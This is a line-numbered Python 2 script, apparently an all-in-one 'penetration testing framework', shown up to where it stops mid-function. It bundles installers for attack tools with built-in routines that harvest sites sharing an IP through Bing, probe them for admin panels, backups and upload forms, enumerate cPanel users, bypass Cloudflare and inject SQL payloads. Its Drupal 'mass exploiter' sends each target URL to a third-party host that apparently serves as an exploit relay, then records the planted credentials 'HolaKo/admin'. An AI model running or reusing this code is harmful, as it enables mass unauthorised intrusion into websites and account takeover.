WE-ARE-ANONY

1. #!/usr/bin/env python2.7
2. #
3. # All In One Tool For Penetration Testing
4. # Authors : Fedy Wesleti , Mohamed Nour
5. #
6. import sys
7. import os
8. import time
9. import httplib
10. import subprocess
11. import re, urllib2
12. import socket
13. import urllib,sys,json
14. import telnetlib
15. import glob
16. import random
17. import Queue
18. import threading
19. from getpass import getpass
20. from commands import *
21. from sys import argv
22. from platform import system
23. from urlparse import urlparse
24. from xml.dom import minidom
25. from optparse import OptionParser
26. from time import sleep
27. ##########################
28. #Variables
29. yes = set(['yes','y', 'ye', 'Y'])
30. no = set(['no','n'])
31. def logo():
32. print """
33. ######## ######## ## ## ######## ####### ## ##
34. ## ## ## ### ## ## ## ## ## ## ##
35. ## ## ## #### ## ## ## ## ## ## ##
36. ######## ###### ## ## ## ######## ## ## ###
37. ## ## ## #### ## ## ## ## ## ##
38. ## ## ## ### ## ## ## ## ## ##
39. ## ######## ## ## ######## ####### ## ## v1.2
40. A Penetration Testing Framework
41.  
42. [+] Coded BY Fedy Wesleti & Mohamed Nour [+]
43. [+] FB/CEH.TN ~~ FB/mohamed.zeus.0 [+]
44. [+] Greetz To All Pentesters [+]
45. """
46. def menu():
47. print ("""
48. ######## ######## ## ## ######## ####### ## ##
49. ## ## ## ### ## ## ## ## ## ## ##
50. ## ## ## #### ## ## ## ## ## ## ##
51. ######## ###### ## ## ## ######## ## ## ###
52. ## ## ## #### ## ## ## ## ## ##
53. ## ## ## ### ## ## ## ## ## ##
54. ## ######## ## ## ######## ####### ## ## v1.2
55. A Penetration Testing Framework
56.  
57. [+] Coded BY Fedy Wesleti & Mohamed Nour [+]
58. [+] FB/CEH.TN ~~ FB/mohamed.zeus.0 [+]
59. [+] Greetz To All Pentesters [+]
60. Select from the menu:
61. 1 : Information Gathering
62. 2 : Password Attacks
63. 3 : Wireless Testing
64. 4 : Exploitation Tools
65. 5 : Sniffing & Spoofing
66. 6 : Web Hacking
67. 7 : Privat Tools
68. 99 : Exit
69. """)
70. choice = raw_input("Enter Your Choice:")
71.  
72. if choice == "1":
73. info()
74. elif choice == "2":
75. passwd()
76. elif choice == "3":
77. wire()
78. elif choice == "4":
79. exp()
80. elif choice == "5":
81. snif()
82. elif choice == "6":
83. webhack()
84. elif choice == "7":
85. tnn()
86. elif choice == "99":
87. clearScr(),sys.exit();
88. elif choice == "":
89. menu()
90. else:
91. menu()
92. def h2ip():
93. host = raw_input("Select A Host : ")
94. ips = socket.gethostbyname(host)
95. print(ips)
96. def ports():
97. clearScr()
98. target = raw_input('Select a Target IP :')
99. os.system("nmap -O -Pn %s" % target)
100. sys.exit();
101. def ifinurl():
102. print""" This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found."""
103. print('do you have Inurlbr installed ? ')
104. cinurl = raw_input("Y / N : ")
105. if cinurl in yes:
106. inurl()
107. if cinurl in no:
108. menu()
109. elif cinurl == "":
110. menu()
111. else:
112. menu()
113. def commix():
114. print ("Automated All-in-One OS Command Injection and Exploitation Tool.")
115. print ("usage : python commix.py --help")
116. choicecmx = raw_input("Continue: y/n :")
117. if choicecmx in yes:
118. os.system("git clone https://github.com/stasinopoulos/commix.git commix")
119. elif choicecmx in no:
120. os.system('clear'); info()
121.  
122. def pixiewps():
123. print"""Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only
124. """
125. choicewps = raw_input("Continue ? Y/N : ")
126. if choicewps in yes :
127. os.system("git clone https://github.com/wiire/pixiewps.git")
128. os.system(" cd pixiewps/src & make ")
129. os.system(" cd pixiewps/src & sudo make install")
130. if choicewps in no :
131. menu()
132. elif choicewps == "":
133. menu()
134. else:
135. menu()
136. def webhack():
137. print("1 : Drupal Hacking ")
138. print("2 : Inurlbr")
139. print("3 : Wordpress & Joomla Scanner")
140. print("4 : Gravity Form Scanner")
141. print("5 : File Upload Checker")
142. print("6 : Wordpress Exploit Scanner")
143. print("99 : Exit")
144. choiceweb = raw_input("Enter Your Choice : ")
145. if choiceweb == "1":
146. clearScr()
147. maine()
148. if choiceweb == "2":
149. clearScr(); ifinurl()
150. if choiceweb =='3':
151. clearScr(); wppjmla()
152. if choiceweb =="4":
153. clearScr(); gravity()
154. if choiceweb =="5":
155. clearScr(); sqlscan()
156. if choiceweb =="6":
157. clearScr(); wpminiscanner()
158. elif choiceweb =="99":
159. menu()
160. elif choiceweb == "":
161. menu()
162. else:
163. menu()
164. def inurl():
165. dork = raw_input("select a Dork:")
166. output = raw_input("select a file to save :")
167. os.system("./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output))
168. if cinurl in no:
169. insinurl()
170. elif cinurl == "":
171. menu()
172. else:
173. menu()
174. def insinurl():
175. os.system("git clone https://github.com/googleinurl/SCANNER-INURLBR.git")
176. os.system("chmod +x SCANNER-INURLBR/inurlbr.php")
177. os.system("apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl")
178. os.system("mv /SCANNER-INURLBR/inurbr.php inurlbr.php")
179. clearScr()
180. inurl()
181. def nmap():
182.  
183. choice7 = raw_input("continue ? Y / N : ")
184. if choice7 in yes :
185. os.system("wget https://nmap.org/dist/nmap-7.01.tar.bz2")
186. os.system("bzip2 -cd nmap-7.01.tar.bz2 | tar xvf -")
187. os.system("cd nmap-7.01 & ./configure")
188. os.system("cd nmap-7.01 & make")
189. os.system("su root")
190. os.system("cd nmap-7.01 & make install")
191. elif choice7 in no :
192. info()
193. elif choice7 == "":
194. menu()
195. else:
196. menu()
197. def jboss():
198. os.system('clear')
199. print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once")
200. print ("deployed, the script uses its upload and command execution capability to")
201. print ("provide an interactive session.")
202. print ("")
203. print ("usage : ./e.sh target_ip tcp_port ")
204. print("Continue: y/n")
205. choice9 = raw_input("yes / no :")
206. if choice9 in yes:
207. os.system("git clone https://github.com/SpiderLabs/jboss-autopwn.git"),sys.exit();
208. elif choice9 in no:
209. os.system('clear'); exp()
210. elif choice9 == "":
211. menu()
212. else:
213. menu()
214. def sqlmap():
215. print ("usage : python sqlmap.py -h")
216. choice8 = raw_input("Continue: y/n :")
217. if choice8 in yes:
218. os.system("git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & ")
219. elif choice8 in no:
220. os.system('clear'); info()
221. elif choice8 == "":
222. menu()
223. else:
224. menu()
225. def setoolkit():
226. print ("The Social-Engineer Toolkit is an open-source penetration testing framework")
227. print(") designed for social engineering. SET has a number of custom attack vectors that ")
228. print(" allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC ")
229. print("an information security consulting firm located in Cleveland, Ohio.")
230. print("")
231. choiceset = raw_input("y / n :")
232. if choiceset in yes:
233. os.system("git clone https://github.com/trustedsec/social-engineer-toolkit.git")
234. os.system("python social-engineer-toolkit/setup.py")
235. if choiceset in no:
236. clearScr(); info()
237. elif choiceset == "":
238. menu()
239. else:
240. menu()
241. def cupp():
242. print("cupp is a password list generator ")
243. print("Usage: python cupp.py -h")
244. choicecupp = raw_input("Continue: y/n : ")
245.  
246. if choicecupp in yes:
247. os.system("git clone https://github.com/Mebus/cupp.git")
248. print("file downloaded successfully")
249. elif choicecupp in no:
250. clearScr(); passwd()
251. elif choicecupp == "":
252. menu()
253. else:
254. menu()
255. def ncrack():
256. print("A Ruby interface to Ncrack, Network authentication cracking tool.")
257. print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3")
258. print("Continue: y/n")
259. choicencrack = raw_input("y / n :")
260. if choicencrack in yes:
261. os.system("git clone https://github.com/sophsec/ruby-ncrack.git")
262. os.system("cd ruby-ncrack")
263. os.system("install ruby-ncrack")
264. elif choicencrack in no:
265. clearScr(); passwd()
266. elif choicencrack == "":
267. menu()
268. else:
269. menu()
270. def reaver():
271. print """
272. Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup
273. WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a
274. wide variety of access points and WPS implementations
275. 1 to accept / 0 to decline
276. """
277. creaver = raw_input("y / n :")
278. if creaver in yes:
279. os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps")
280. os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git")
281. os.system("cd reaver-wps-fork-t6x/src/ & ./configure")
282. os.system("cd reaver-wps-fork-t6x/src/ & make")
283. elif creaver in no:
284. clearScr(); wire()
285. elif creaver == "":
286. menu()
287. else:
288. menu()
289. def ssls():
290. print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
291. attacks.
292. It requires Python 2.5 or newer, along with the 'twisted' python module."""
293. cssl = raw_input("y / n :")
294. if cssl in yes:
295. os.system("git clone https://github.com/moxie0/sslstrip.git")
296. os.system("sudo apt-get install python-twisted-web")
297. os.system("python sslstrip/setup.py")
298. if cssl in no:
299. snif()
300. elif cssl =="":
301. menu()
302. else:
303. menu()
304. def unique(seq):
305. seen = set()
306. return [seen.add(x) or x for x in seq if x not in seen]
307. def bing_all_grabber(s):
308.  
309. lista = []
310. page = 1
311. while page <= 101:
312. try:
313. bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page)
314. openbing = urllib2.urlopen(bing)
315. readbing = openbing.read()
316. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
317. for i in range(len(findwebs)):
318. allnoclean = findwebs[i]
319. findall1 = re.findall('http://(.*?)/', allnoclean)
320. for idx, item in enumerate(findall1):
321. if 'www' not in item:
322. findall1[idx] = 'http://www.' + item + '/'
323. else:
324. findall1[idx] = 'http://' + item + '/'
325. lista.extend(findall1)
326.  
327. page += 50
328. except urllib2.URLError:
329. pass
330.  
331. final = unique(lista)
332. return final
333. def check_gravityforms(sites) :
334. import urllib
335. gravityforms = []
336. for site in sites :
337. try :
338. if urllib.urlopen(site+'wp-content/plugins/gravityforms/gravityforms.php').getcode() == 403 :
339. gravityforms.append(site)
340. except :
341. pass
342.  
343. return gravityforms
344. def gravity():
345. ip = raw_input('Enter IP : ')
346. sites = bing_all_grabber(str(ip))
347. gravityforms = check_gravityforms(sites)
348. for ss in gravityforms :
349. print ss
350.  
351. print '\n'
352. print '[*] Found, ', len(gravityforms), ' gravityforms.'
353. def shellnoob():
354. print """Writing shellcodes has always been super fun, but some parts are extremely boring and error prone. Focus only on the fun part, and use ShellNoob!"""
355. cshell = raw_input("Y / N : ")
356. if cshell in yes:
357. os.system("git clone https://github.com/reyammer/shellnoob.git")
358. os.system("mv shellnoob/shellnoob.py shellnoob.py")
359. os.system("sudo python shellnoob.py --install")
360. if cshell in no:
361. exp()
362. elif cshell =="":
363. menu()
364. else:
365. menu()
366. def info():
367. print("1: nmap ")
368. print("2: Setoolkit")
369. print("3: Port Scanning")
370. print("4: Host To IP")
371. print("99: Back To Main Menu")
372. choice2 = raw_input("Select from the menu:")
373. if choice2 == "1":
374. os.system('clear'); nmap()
375. if choice2 == "2":
376. clearScr(); setoolkit()
377. if choice2 == "3":
378. clearScr(); ports()
379. if choice2 == "4":
380. clearScr(); h2ip()
381. elif choice2 =="99":
382. clearScr(); menu()
383. elif choice2 == "":
384. menu()
385. else:
386. menu()
387. def priv8():
388. tnn()
389. def passwd():
390. print("1: cupp ")
391. print("2: Ncrack")
392. print("99: Back To Main Menu")
393. choice3 = raw_input("Select from the menu:")
394. if choice3 =="1":
395. clearScr(); cupp()
396. elif choice3 =="2":
397. clearScr(); ncrack()
398. elif choice3 =="99":
399. clearScr(); menu()
400. elif choice3 == "":
401. menu()
402. else:
403. menu()
404. def wire():
405. print("1 : reaver ")
406. print("2 : pixiewps")
407. print("99: Back To The Main Menu")
408. choice4 = raw_input("Select from the menu:")
409. if choice4 =="1":
410. clearScr();reaver()
411. if choice4 =="2":
412. clearScr(); pixiewps()
413. elif choice4 =="99":
414. menu()
415. elif choice4 == "":
416. menu()
417. else:
418. menu()
419. def exp():
420. print("1 : jboss-autopwn ")
421. print("2 : sqlmap")
422. print("3 : Shellnoob")
423. print("4 : commix")
424. print("99 : Go Back To Main Menu")
425. choice5 = raw_input("Select from the menu:")
426. if choice5 =="2":
427. clearScr(); sqlmap()
428. if choice5 =="1":
429. os.system('clear'); jboss()
430. if choice5 =="3":
431. clearScr(); shellnoob()
432. if choice5 =="4":
433. os.system("clear"); commix()
434. elif choice5 =="99":
435. menu()
436. elif choice5 == "":
437. menu()
438. else:
439. menu()
440. def snif():
441. print("1 : Setoolkit ")
442. print("2 : Ssltrip")
443. print("99: Back To Main Menu")
444. choice6 = raw_input("Select from the menu:")
445. if choice6 =="1":
446. clearScr(); setoolkit()
447. if choice6 =="2":
448. clearScr(); ssls()
449. if choice6 =="99":
450. clearScr(); menu()
451. elif choice6 == "":
452. menu()
453. else:
454. menu()
455. def win():
456. clearScr()
457. print("Our Tool Does Not Support Windows , run it on linux or install a virtual machine ")
458. sys.exit();
459. #Check use OS
460. def OS():
461. print(
462. """
463. Choose Operating System :
464. 1) Mac OSX
465. 2) Linux
466. 3) Windows
467. """)
468. system = raw_input("choose an OS : ")
469. if system =="2":
470. menu()
471. elif system =="1":
472. root()
473. elif system =="3":
474. win()
475. elif system == "":
476. OS()
477. else:
478. sys.exit();
479. def root():
480. if os.getuid() != 0:
481. print("Are you root? Please execute as root")
482. exit()
483. else:
484. menu()
485. menuu = """
486. 1) Get all websites
487. 2) Get joomla websites
488. 3) Get wordpress websites
489. 4) Find control panel
490. 5) Find zip files
491. 6) Find upload files
492. 7) Get server users
493. 8) Scan from SQL injection
494. 9) Scan ports (range of ports)
495. 10) Scan ports (common ports)
496. 11) Get server banner
497. 12) Bypass Cloudflare
498. 99) Exit
499. """
500. def unique(seq):
501. """
502. get unique from list found it on stackoverflow
503. """
504. seen = set()
505. return [seen.add(x) or x for x in seq if x not in seen]
506. def clearScr() :
507. """
508. clear the screen in case of GNU/Linux or
509. windows
510. """
511. if system() == 'Linux':
512. os.system('clear')
513. if system() == 'Windows':
514. os.system('cls')
515. class TNscan : #TNscan Function menu
516. def __init__(self, serverip) :
517. self.serverip = serverip
518. self.getSites(False)
519. print menuu
520. while True :
521. choice = raw_input(' Enter choice -> ')
522. if choice == '1' :
523. self.getSites(True)
524. elif choice == '2' :
525. self.getJoomla()
526. elif choice == '3' :
527. self.getWordpress()
528. elif choice == '4' :
529. self.findPanels()
530. elif choice == '5' :
531. self.findZip()
532. elif choice == '6' :
533. self.findUp()
534. elif choice == '7' :
535. self.getUsers()
536. elif choice == '8' :
537. self.grabSqli()
538. elif choice == '9' :
539. ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
540. self.portScanner(1, ran)
541. elif choice == '10' :
542. self.portScanner(2, None)
543. elif choice == '11' :
544. self.getServerBanner()
545. elif choice == '12' :
546. self.cloudflareBypasser()
547. elif choice == '99' :
548. menu()
549. con = raw_input(' Continue [Y/n] -> ')
550. if con[0].upper() == 'N' :
551. exit()
552. else :
553. clearScr()
554. print menuu
555. def getSites(self, a) :
556. """
557. get all websites on same server
558. from bing search
559. """
560. lista = []
561. page = 1
562. while page <= 101:
563. try:
564. bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page)
565. openbing = urllib2.urlopen(bing)
566. readbing = openbing.read()
567. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
568. for i in range(len(findwebs)):
569. allnoclean = findwebs[i]
570. findall1 = re.findall('http://(.*?)/', allnoclean)
571. for idx, item in enumerate(findall1):
572. if 'www' not in item:
573. findall1[idx] = 'http://www.' + item + '/'
574. else:
575. findall1[idx] = 'http://' + item + '/'
576. lista.extend(findall1)
577.  
578. page += 50
579. except urllib2.URLError:
580. pass
581. self.sites = unique(lista)
582. if a :
583. clearScr()
584. print '[*] Found ', len(lista), ' Website\n'
585. for site in self.sites :
586. print site
587. def getWordpress(self) :
588. """
589. get wordpress site using a dork the attacker
590. may do a password list attack (i did a tool for that purpose check my pastebin)
591. or scan for common vulnerabilities using wpscan for example (i did a simple tool
592. for multi scanning using wpscan)
593. """
594. lista = []
595. page = 1
596. while page <= 101:
597. try:
598. bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+?page_id=&count=50&first=" + str(page)
599. openbing = urllib2.urlopen(bing)
600. readbing = openbing.read()
601. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
602. for i in range(len(findwebs)):
603. wpnoclean = findwebs[i]
604. findwp = re.findall('(.*?)\?page_id=', wpnoclean)
605. lista.extend(findwp)
606. page += 50
607. except:
608. pass
609. lista = unique(lista)
610. clearScr()
611. print '[*] Found ', len(lista), ' Wordpress Website\n'
612. for site in lista :
613. print site
614. def getJoomla(self) :
615. """
616. get all joomla websites using
617. bing search the attacker may bruteforce
618. or scan them
619. """
620. lista = []
621. page = 1
622. while page <= 101:
623. bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+index.php?option=com&count=50&first=" + str(page)
624. openbing = urllib2.urlopen(bing)
625. readbing = openbing.read()
626. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
627. for i in range(len(findwebs)):
628. jmnoclean = findwebs[i]
629. findjm = re.findall('(.*?)index.php', jmnoclean)
630. lista.extend(findjm)
631. page += 50
632. lista = unique(lista)
633. clearScr()
634. print '[*] Found ', len(lista), ' Joomla Website\n'
635. for site in lista :
636. print site
637. ############################
638. #find admin panels
639. def findPanels(self) :
640. """
641. find panels from grabbed websites
642. the attacker may do a lot of vulnerabilty
643. tests on the admin area
644. """
645. print "[~] Finding admin panels"
646. adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
647. clearScr()
648. for site in self.sites :
649. for admin in adminList :
650. try :
651. if urllib.urlopen(site + admin).getcode() == 200 :
652. print " [*] Found admin panel -> ", site + admin
653. except IOError :
654. pass
655. ############################
656. #find ZIP files
657. def findZip(self) :
658. """
659. find zip files from grabbed websites
660. it may contain useful informations
661. """
662. zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
663. clearScr()
664. print "[~] Finding zip file"
665. for site in self.sites :
666. for zip1 in zipList :
667. try:
668. if urllib.urlopen(site + zip1).getcode() == 200 :
669. print " [*] Found zip file -> ", site + zip1
670. except IOError :
671. pass
672. ############################
673. #find upload directories
674. def findUp(self) :
675. """
676. find upload forms from grabbed
677. websites the attacker may succeed to
678. upload malicious files like webshells
679. """
680. upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
681. clearScr()
682. print "[~] Finding Upload"
683. for site in self.sites :
684. for up in upList :
685. try :
686. if (urllib.urlopen(site + up).getcode() == 200) :
687. html = urllib.urlopen(site + up).readlines()
688. for line in html :
689. if re.findall('type=file', line) :
690. print " [*] Found upload -> ", site+up
691. except IOError :
692. pass
693. ############################
694. #find users
695. def getUsers(self) :
696. """
697. get server users using a method found by
698. iranian hackers , the attacker may
699. do a bruteforce attack on CPanel, ssh, ftp or
700. even mysql if it supports remote login
701. (you can use medusa or hydra)
702. """
703. clearScr()
704. print "[~] Grabbing Users"
705. userslist = []
706. for site1 in self.sites :
707. try:
708. site = site1
709. site = site.replace('http://www.', '')
710. site = site.replace('http://', '')
711. site = site.replace('.', '')
712. if '-' in site:
713. site = site.replace('-', '')
714. site = site.replace('/', '')
715. while len(site) > 2:
716. resp = urllib2.urlopen(site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
717. if 'invalid username' not in resp.lower():
718. print '\t [*] Found -> ', site
719. userslist.append(site)
720. break
721. else :
722. print site
723.  
724. site = site[:-1]
725. except:
726. pass
727.  
728. clearScr()
729. for user in userslist :
730. print user
731. ############################
732. #bypass cloudflare
733. def cloudflareBypasser(self) :
734. """
735. trys to bypass cloudflare i already wrote
736. in my blog how it works, i learned this
737. method from a guy in madleets
738. """
739. clearScr()
740. print "[~] Bypassing cloudflare"
741. subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
742. for site in self.sites :
743. site.replace('http://', '')
744. site.replace('/', '')
745. try:
746. ip = socket.gethostbyname(site)
747. except socket.error:
748. pass
749. for sub in subdoms:
750. doo = sub + '.' + site
751. print ' [~] Trying -> ', doo
752. try:
753. ddd = socket.gethostbyname(doo)
754. if ddd != ip:
755. print ' [*] Cloudflare bypassed -> ', ddd
756. break
757. except socket.error :
758. pass
759. ############################
760. #find the server banner
761. def getServerBanner(self) :
762. """
763. simply gets the server banner
764. the attacker may benefit from it
765. like getting the server side software
766. """
767. clearScr()
768. try:
769. s = 'http://' + self.serverip
770. httpresponse = urllib.urlopen(s)
771. print ' [*] Server header -> ', httpresponse.headers.getheader('server')
772. except:
773. pass
774. ############################
775. #greb the sqli
776. def grabSqli(self) :
777. """
778. just grabs all websites in server with php?id= dork
779. for scanning for error based sql injection
780. """
781. page = 1
782. lista = []
783. while page <= 101:
784. try:
785. bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page)
786. openbing = urllib2.urlopen(bing)
787. readbing = openbing.read()
788. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
789. for i in range(len(findwebs)):
790. x = findwebs[i]
791. lista.append(x)
792. except:
793. pass
794. page += 50
795. lista = unique(lista)
796. self.checkSqli(lista)
797. ############################
798. #scan for sql injection
799. def checkSqli(self, s):
800. """
801. checks for error based sql injection,
802. most of the codes here are from webpwn3r
803. project the one who has found an lfi in
804. yahoo as i remember, you can find a separate
805. tool in my blog
806. """
807. clearScr()
808. print "[~] Checking SQL injection"
809. payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
810. check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
811. for url in s:
812. try:
813. for param in url.split('?')[1].split('&'):
814. for payload in payloads:
815. power = url.replace(param, param + payload.strip())
816. #print power
817. html = urllib2.urlopen(power).readlines()
818. for line in html:
819. checker = re.findall(check, line)
820. if len(checker) != 0 :
821. print ' [*] SQLi found -> ', power
822. except:
823. pass
824. ############################
825. ############################
826. #scan for ports
827. def portScanner(self, mode, ran) :
828. """
829. simple port scanner works with range of ports
830. or with common ports (al-swisre idea)
831. """
832. clearScr()
833. print "[~] Scanning Ports"
834. def do_it(ip, port):
835. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
836. #sock.settimeout(5)
837. sock = sock.connect_ex((ip,port))
838. if sock == 0:
839. print " [*] Port %i is open" % port
840.  
841. if mode == 1 :
842. a = ran.split('-')
843. start = int(a[0])
844. end = int(a[1])
845. for i in range(start, end):
846. do_it(self.serverip, i)
847. elif mode == 2 :
848. for port in [80,21,22,2082,25,53,110,443,143] :
849. # didn't use multithreading cos it's few ports
850. do_it(self.serverip, port)
851. ############################
852. minu ='''
853. \t 1: Drupal Bing Exploiter
854. \t 2: Get Drupal Websites
855. \t 3: Drupal Mass Exploiter
856. \t 99: Back To Main Menu
857. '''
858.  
859.  
860. #Definition Of Drupal Bing Expoliter
861. def drupal():
862.  
863. '''Drupal Exploit Binger All Websites Of server '''
864. ip = raw_input('1- IP : ')
865. page = 1
866. while page <= 50 :
867.  
868. url = "http://www.bing.com/search?q=ip%3A"+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page)
869. req = urllib2.Request(url)
870. opreq = urllib2.urlopen(req).read()
871. findurl = re.findall('<div class="b_title"><h2><a href="(.*?)" h=',opreq)
872. page += 1
873.  
874. for url in findurl :
875. try :
876.  
877. urlpa = urlparse(url)
878. site = urlpa.netloc
879.  
880. print "[+] Testing At "+site
881. resp = urllib2.urlopen('http://crig-alda.ro/wp-admin/css/index2.php?url='+site+'&submit=submit')
882. read=resp.read()
883. if "User : HolaKo" in read:
884. print "Exploit found =>"+site
885.  
886. print "user:HolaKo\npass:admin"
887. a = open('up.txt','a')
888. a.write(site+'\n')
889. a.write("user:"+user+"\npass:"+pwd+"\n")
890. else :
891. print "[-] Expl Not Found :( "
892.  
893. except Exception as ex :
894. print ex
895. sys.exit(0)
896.  
897.  
898. #Drupal Server ExtraCtor
899. def getdrupal():
900. ip = raw_input('Enter The Ip : ')
901. page = 1
902. sites = list()
903. while page <= 50 :
904.  
905. url = "http://www.bing.com/search?q=ip%3A"+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page)
906. req = urllib2.Request(url)
907. opreq = urllib2.urlopen(req).read()
908. findurl = re.findall('<div class="b_title"><h2><a href="(.*?)" h=',opreq)
909. page += 1
910.  
911. for url in findurl :
912. split = urlparse(url)
913. site = split.netloc
914. if site not in sites :
915. print site
916. sites.append(site)
917.  
918.  
919. #Drupal Mass List Exploiter
920. def drupallist():
921. listop = raw_input("Enter The list Txt :")
922. fileopen = open(listop,'r')
923. content = fileopen.readlines()
924. for i in content :
925. url=i.strip()
926. try :
927. openurl = urllib2.urlopen('http://crig-alda.ro/wp-admin/css/index2.php?url='+url+'&submit=submit')
928. readcontent = openurl.read()
929. if "Success" in readcontent :
930. print "[+]Success =>"+url
931. print "[-]username:HolaKo\n[-]password:admin"
932. save = open('drupal.txt','a')
933. save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n")
934.  
935. else :
936. print i + "=> exploit not found "
937. except Exception as ex :
938. print ex
939. def maine():
940.  
941. print minu
942. choose = raw_input("choose a number :")
943. while True :
944.  
945. if choose == "1":
946. drupal()
947. if choose == "2":
948. getdrupal()
949. if choose == "3":
950. drupallist()
951. if choose == "4":
952. about()
953. if choose == "99":
954.  
955. menu()
956. con = raw_input('Continue [Y/n] -> ')
957. if con[0].upper() == 'N' :
958. exit()
959. if con[0].upper() == 'Y' :
960. maine()
961. def unique(seq):
962. seen = set()
963. return [seen.add(x) or x for x in seq if x not in seen]
964. def bing_all_grabber(s):
965. lista = []
966. page = 1
967. while page <= 101:
968. try:
969. bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page)
970. openbing = urllib2.urlopen(bing)
971. readbing = openbing.read()
972. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
973. for i in range(len(findwebs)):
974. allnoclean = findwebs[i]
975. findall1 = re.findall('http://(.*?)/', allnoclean)
976. for idx, item in enumerate(findall1):
977. if 'www' not in item:
978. findall1[idx] = 'http://www.' + item + '/'
979. else:
980. findall1[idx] = 'http://' + item + '/'
981. lista.extend(findall1)
982.  
983. page += 50
984. except urllib2.URLError:
985. pass
986.  
987. final = unique(lista)
988. return final
989. def check_wordpress(sites) :
990. wp = []
991. for site in sites :
992. try :
993. if urllib2.urlopen(site+'wp-login.php').getcode() == 200 :
994. wp.append(site)
995. except :
996. pass
997.  
998. return wp
999. def check_joomla(sites) :
1000. joomla = []
1001. for site in sites :
1002. try :
1003. if urllib2.urlopen(site+'administrator').getcode() == 200 :
1004. joomla.append(site)
1005. except :
1006. pass
1007.  
1008. return joomla
1009. def wppjmla():
1010.  
1011. ipp = raw_input('Enter Target IP: ')
1012. sites = bing_all_grabber(str(ipp))
1013. wordpress = check_wordpress(sites)
1014. joomla = check_joomla(sites)
1015. for ss in wordpress :
1016. print ss
1017. print '[+] Found ! ', len(wordpress), ' Wordpress Websites'
1018. print '-'*30+'\n'
1019. for ss in joomla :
1020. print ss
1021.  
1022.  
1023. print '[+] Found ! ', len(joomla), ' Joomla Websites'
1024.  
1025. print '\n'
1026. #initialise the tnscan function
1027. class tnn():
1028. def __init__(self):
1029. clearScr()
1030. aaa = raw_input("Target IP : ")
1031. TNscan(aaa)
1032. ############################
1033. class bcolors:
1034. HEADER = ''
1035. OKBLUE = ''
1036. OKGREEN = ''
1037. WARNING = ''
1038. FAIL = ''
1039. ENDC = ''
1040. CYAN = ''
1041. class colors():
1042. PURPLE = ''
1043. CYAN = ''
1044. DARKCYAN = ''
1045. BLUE = ''
1046. GREEN = ''
1047. YELLOW = ''
1048. RED = ''
1049. BOLD = ''
1050. ENDC = ''
1051. def grabsqli(ip):
1052. try :
1053. print bcolors.OKBLUE + "Check_Uplaod... "
1054. print '\n'
1055.  
1056. page = 1
1057. while page <= 21:
1058. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+upload&count=50&first="+str(page)
1059. openbing = urllib2.urlopen(bing)
1060. readbing = openbing.read()
